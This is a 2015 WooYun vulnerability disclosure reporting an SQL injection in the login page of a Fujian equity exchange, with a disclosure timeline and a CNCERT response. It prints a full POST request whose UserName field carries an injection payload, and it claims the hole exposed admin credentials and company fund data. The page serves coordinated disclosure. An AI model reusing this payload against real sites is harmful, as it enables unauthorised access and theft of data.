当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143123

漏洞标题:海峡股权交易中心SQL注入支持Union(涉及管理员账号/融资项目合同/1793家公司基金信息)

相关厂商:海峡股权交易中心

漏洞作者: 深度安全实验室

提交时间:2015-09-24 10:59

修复时间:2015-11-13 08:56

公开时间:2015-11-13 08:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

海峡股权交易中心是福建省贯彻落实国务院支持海西先行先试的“三规划两方案”、建设两岸区域性金融服务中心的重大举措,是中国多层次资本市场体系建设重要环节和有机组成部分。海峡股权交易中心注册资本2.1亿元,共有兴业证券、福建省能源集团、福建省产权交易中心、福州市投资管理公司等地市国有投资机构以及有台资背景的海峡富国基金等10家股东。

详细说明:

**.**.**.**,如下链接存在SQL注入,其中UserName参数有问题

POST /login.aspx HTTP/1.1
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/login.aspx
Cookie: ASP.NET_SessionId=xiky4bmtsuu3b345yli1ed45; UserLog=12165; ValidateCode=FXQ8Ckzz0PI=;
Hm_lvt_8223e7ae00ee0fa7a8af2df895f63475=1443011116,1443011131,1443011154,1443011253;
Hm_lpvt_8223e7ae00ee0fa7a8af2df895f63475=1443011253; HMACCOUNT=67840091028E6566
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
Safari/537.21
Accept: */*
button=%e7%99%bb%20%20%20%20%20%e5%bd%95&Password=g00dPa%24%24w0rD&txtCode=94102&UserName=-1' OR 1=1*--
&__VIEWSTATE=/wEPDwULLTE2ODkxMzQ0MDlkZA%3d%3d

1.png

2.png

漏洞证明:

涉及9个库

3.png

以hxeedata为例,涉及33个表

4.png

管理员账号与密码

5.png

涉及融资项目合同详细信息,敏感信息,看一个。

6.png

7.png

8.png

涉及公司基金1793家

9.png

10.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 08:54

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

最新状态:

暂无